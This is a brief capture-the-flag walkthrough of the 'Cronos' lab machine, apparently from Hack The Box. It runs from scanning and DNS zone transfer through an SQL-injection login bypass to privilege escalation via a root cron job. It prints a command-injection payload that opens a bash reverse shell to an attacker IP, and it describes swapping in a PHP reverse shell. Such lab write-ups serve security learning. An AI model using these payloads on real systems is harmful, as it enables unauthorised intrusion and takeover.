CRONOS

Starting by nmap scan as always and we see that 22,53,80 ports are open.

nmap -sC -sV -O -o nmap.txt 10.129.165.192

Lets make directory fuzzing.

dirsearch -u 10.129.165.192 -t 10 --random-agent --full-url -x 400,403,404,500

We can’t get anything with directory fuzz. We will find the existing domain addresses with dns zone transfer and add them to our etc/hosts file.

There is no direct access to the found domain addresses from the browser, so we add them to our etc/hosts file.

There is a login panel at admin.cronos.htb We can log in when we try sql injection.

We are trying a brute force attack with sql payloads that bypass login and we have a working payload.

As we can see, Linux commands work, basic shell, but it is very limited, so we will do reverse shell for get full interactive shell. We open NeTcat and execute the following code from the net tool.

; /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.94/443 0>&1"

we get the shell and user flag, now we will do privilege escalation.

We check if there is a job called by root on the cron job side. There is a thing called Artisan. If we replace this file with revershell, we get root shell. It’s a little bit complicated here.

We save it on our machine. We will send this php revershell code to the target machine, for this we will open http server on our machine.

We replace artisan with revershell, artisan is called by root, When we open netcat from another terminal, shell with root authority called and drops to netcat.